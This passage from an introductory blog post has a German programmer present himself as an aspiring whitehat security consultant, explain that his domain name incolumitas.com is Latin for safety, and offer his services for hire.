embarrassing circumstance that my design knowledge is pretty ...eehhm...
basic, you'd better stay patient until you see the production level of
this blog... That can take several weeks.</p>
<p>I am a 21-year-old German programmer and hopefully, sometime in the
future, a freelance security consultant. In the foreseeable future, I'll
post audit sessions, papers and tutorials on this blog. I would
consider myself a whitehat, so don't expect illicit stuff from me. My
favourite programming languages are Python and C. Everything I do for
myself that can be done painlessly in those programming languages will be
done in one of these.</p>
<p>Maybe you ask yourself what <strong>incolumitas.com</strong> means?</p>
<p>Well, it's the Latin translation for <strong>safety</strong> and since every good
domain name is already taken, I just switched to a different language
(Latin if you're curious) and a not so common word for safety. The DNS
name matches my needs perfectly, because it points directly to the main
intention of this site:</p>
<p><em>Offering security services.</em></p>
<p>You can hire me. Don't hesitate to ask me anything...</p>